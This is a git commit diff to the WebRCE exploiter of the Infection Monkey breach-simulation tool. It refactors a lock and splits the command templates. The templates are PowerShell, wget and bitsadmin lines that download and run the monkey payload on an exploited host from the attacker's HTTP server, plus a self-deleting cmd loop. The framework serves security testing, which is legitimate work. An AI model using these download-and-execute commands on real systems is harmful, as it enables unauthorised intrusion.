forked from p34709852/monkey
Bugfix: model.__init__ changed( I forgot to add the file to the branch) and server lock is not a singleton anymore
This commit is contained in:
parent
3f8d63c2d9
commit
8e684a3fad
|
@ -13,8 +13,6 @@ __author__ = 'VakarisZ'
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
LOCK = Lock()
|
|
||||||
|
|
||||||
class WebRCE(HostExploiter):
|
class WebRCE(HostExploiter):
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
|
@ -237,14 +235,15 @@ class WebRCE(HostExploiter):
|
||||||
return False
|
return False
|
||||||
# Determine which destination path to use
|
# Determine which destination path to use
|
||||||
LOG.debug("Monkey path found")
|
LOG.debug("Monkey path found")
|
||||||
|
lock = Lock()
|
||||||
path = WebRCE.get_monkey_dest_path(config, src_path)
|
path = WebRCE.get_monkey_dest_path(config, src_path)
|
||||||
if not path:
|
if not path:
|
||||||
return False
|
return False
|
||||||
# To avoid race conditions we pass a locked lock to http servers thread
|
# To avoid race conditions we pass a locked lock to http servers thread
|
||||||
LOCK.acquire()
|
lock.acquire()
|
||||||
# Create server for http download and wait for it's startup.
|
# Create server for http download and wait for it's startup.
|
||||||
http_path, http_thread = HTTPTools.create_locked_transfer(host, src_path, LOCK)
|
http_path, http_thread = HTTPTools.create_locked_transfer(host, src_path, lock)
|
||||||
LOCK.acquire()
|
lock.acquire()
|
||||||
if not http_path:
|
if not http_path:
|
||||||
LOG.debug("Exploiter failed, http transfer creation failed.")
|
LOG.debug("Exploiter failed, http transfer creation failed.")
|
||||||
return False
|
return False
|
||||||
|
@ -278,7 +277,7 @@ class WebRCE(HostExploiter):
|
||||||
LOG.info("Powershell not found in host. Using bitsadmin to download.")
|
LOG.info("Powershell not found in host. Using bitsadmin to download.")
|
||||||
backup_command = RDP_CMDLINE_HTTP % {'monkey_path': path, 'http_path': http_path}
|
backup_command = RDP_CMDLINE_HTTP % {'monkey_path': path, 'http_path': http_path}
|
||||||
resp = exploiter(url, backup_command)
|
resp = exploiter(url, backup_command)
|
||||||
LOCK.release()
|
lock.release()
|
||||||
http_thread.join(DOWNLOAD_TIMEOUT)
|
http_thread.join(DOWNLOAD_TIMEOUT)
|
||||||
http_thread.stop()
|
http_thread.stop()
|
||||||
LOG.info("Uploading proccess finished")
|
LOG.info("Uploading proccess finished")
|
||||||
|
|
|
@ -17,13 +17,19 @@ RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObje
|
||||||
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
|
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
|
||||||
|
|
||||||
# Commands used for downloading monkeys
|
# Commands used for downloading monkeys
|
||||||
POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (DROPPER_ARG, )
|
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%(http_path)s\\\' -OutFile \\\'%(monkey_path)s\\\' -UseBasicParsing\""
|
||||||
WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && chmod +x %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (DROPPER_ARG, )
|
POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
|
||||||
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %%(type)s %%(parameters)s'
|
WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
|
||||||
|
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
||||||
|
CHMOD_MONKEY = "chmod +x %(monkey_path)s"
|
||||||
|
RUN_MONKEY = " %(monkey_path)s %(monkey_type)s %(parameters)s"
|
||||||
# Commands used to check for architecture and if machine is exploitable
|
# Commands used to check for architecture and if machine is exploitable
|
||||||
CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING
|
CHECK_COMMAND = "echo %s" % ID_STRING
|
||||||
CHECK_LINUX = "echo %s && lscpu" % ID_STRING
|
# Architecture checking commands
|
||||||
|
ARCH_WINDOWS = "wmic os get osarchitecture"
|
||||||
|
ARCH_LINUX = "lscpu"
|
||||||
|
|
||||||
# Commands used to check if monkeys already exists
|
# Commands used to check if monkeys already exists
|
||||||
EXISTS = "ls %s"
|
EXISTS = "ls %s"
|
||||||
|
|
||||||
|
DOWNLOAD_TIMEOUT = 300
|
Loading…
Reference in New Issue